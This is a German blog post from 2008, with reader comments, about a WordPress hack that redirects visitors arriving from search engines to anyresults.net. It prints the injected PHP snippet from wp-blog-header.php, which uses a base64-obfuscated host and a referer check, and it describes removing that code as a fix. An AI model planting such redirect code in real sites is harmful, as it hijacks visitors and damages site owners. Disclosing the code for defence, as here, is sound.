Anscheinend ist ein fieser neuer Wordpress Hack in Umlauf, der Seiten, die über Suchmaschienen aufgerufen werden, per 302 Weiterleitung auf die Seite anyresults.net weiterleitet.
Nach derzeitigem Stand sind alle Wordpress Versionen betroffen, also auch Wordpress 2.5.1.
Derzeit gibt es nur temporäre Lösungen.
Ich hab es gerade beim auf dem Blog eines Freundes gesehen: Rufe ich dessen Blog aus IGoogle auf lande ich bei anyresults.net. Kurzes googeln zeigte mir, dass er nicht der einzige ist der betroffen ist.
Der Hack existiert seit etwa einer Woche.
Dabei wird die wp-blog-header.php geändert und folgender Code wird hinzugefügt:
<?php $seref=array(”google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,
“aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref) if(strpos(strtolower(
$_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }
if($ser==”1″ && sizeof($_COOKIE)==0){
header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”);
exit; }?>
Das leitet Besucher von Google, Yahoo und anderen Suchmaschienen auf anyresults.net um. Durch entfernen dieses Codes sollte das problem temporär behoben sein.
Vielen Dank an Christian, der die Lösung entdeckt hat.
Updates folgen sobald mehr bekannt ist.
June 7th, 2008 at 07:40
Hallo,
nach was googelst Du, um betroffene Blogs zu finden? Ich hätte gerne geschaut, ob mein “Quickhack” http://wwgs.stots.de/ das Problem aufspürt – denn genau zu diesem Zweck habe ich das ja geschrieben.
Schönes Wochenende,
Stefan
June 7th, 2008 at 10:14
Müsste man das nicht verhindern können, indem man die die Berechtigungen von 0644 auf 0444 setzt. Somit wäre das Beschreiben ja auch für den Eigentümer verboten, was das Einschleusen von Code verhindert.
Ich weiß allerdings nicht, ob dann der Blog noch funktioniert.
June 7th, 2008 at 10:46
Wordpress ist einfach fürn Arsch. Es ist mir nicht klar, warum das so viele Leute nutzen.. ich hab mir mal den Source angesehen – bei dem Chaos an vielen Stellen ist es kein Wunder, dass das Teil dauernd Löcher hat.
Ich habe sehr gute Erfahrung mit Seredipity gemacht…
psy
June 7th, 2008 at 14:23
@Stefan: Nach betroffenen hab ich nicht gegoogelt. Kam ja eher nur durch zufall darauf wei ich eben die Seite von meinem Kumpel aus dem Google Reader angesurft habe(ich nenn die Seite hier nicht weil ich nicht weiss ob ihm das recht wäre). Dein Tool merkt da aber auch nichts.
@Torsten: Hm, könnte funktionieren. Funktioniert aber nur wenn du nen eigenen Server mit Root Zugang hast. Sonst kann man’s ja gar nicht mehr ändern.
@psy: Naja, Wordpress ist das bekannteste Blog system, daher auch das mit den meisten Erweiterungen und Themes, das wo man am ehesten Support bekommt und letztendlich auch das einfachste für Einsteiger. Ich geb zu auch eher faul zu sein. Daher wordpress druff, Plugins aktivieren, fertig. Dass der Code furchtbar ist steht ausser Frage. Hab mich auch dumm und dämlich gesucht bis ich da mal was gefunden habe. Und seit ich das laden der deuschen Sprache abgestellt habe läuft der Blog soar doppelt so schnell. Weiss der Teufel wie das gecoded ist. Ansonsten bin ich aber ganz zufrieden.
June 7th, 2008 at 15:05
Oh, da werde ich gleich mal unserem “Fiesen Admin” bescheid geben, wir nutzen ja auch Wordpress (+blogdesk) …
June 8th, 2008 at 14:09
Fussball ist cool IT aber auch…
[...] unja, jetzt ist auch die aktuelle 2.5.1. nicht mehr sich – bzw. war sie es noch nie, wie ein neuer Hack aufzeigt. [...]…
June 8th, 2008 at 15:23
Selber schuld, wer die Datei für den Webserver beschreibbar macht!
June 17th, 2008 at 18:42
Ähm, wenn ich das richtig verstehe ist dieser “Hack” doch eher beabsichtigt, um möglichst bei jedem Google-Spider-Aufruf berücksichtigt zu werden… Resultat ist dann, dass man bei jedem Suchbegriff auf einer Suchmaschiene im Index irgendwo auftaucht.
@psy:
Wordpress hat auch angenehme Seiten, seit ich Wordpress einsetz kommt der GoogleSpider täglich vorbei, vorher wars 2x im Monat…. seit 4 Tagen nutz ich Wordpress, und bereits 8 sind über Google-Suchbegriffe gekommen, bei denen ich noch am selben Tag ein Posting gemacht habe, und ihnen weitergeholfen werden konnte (gehe ich mal bei DEN Suchstrings von aus)
June 19th, 2008 at 13:57
Äh ne. Alle eigenen Besucher landen, wenn sie von Google kommen, woanders; nur nicht beim eigenen Blog. Resultat: Position 1 bei der Suche nach Sex aber kein einziger Besucher.
July 5th, 2008 at 20:31
[...] eine Seite wie echtgeldgames.de, die komplett auf Wordpress aufsetzt, ist es wichtig Spammern und Hackern das Leben so schwer wie möglich zu [...]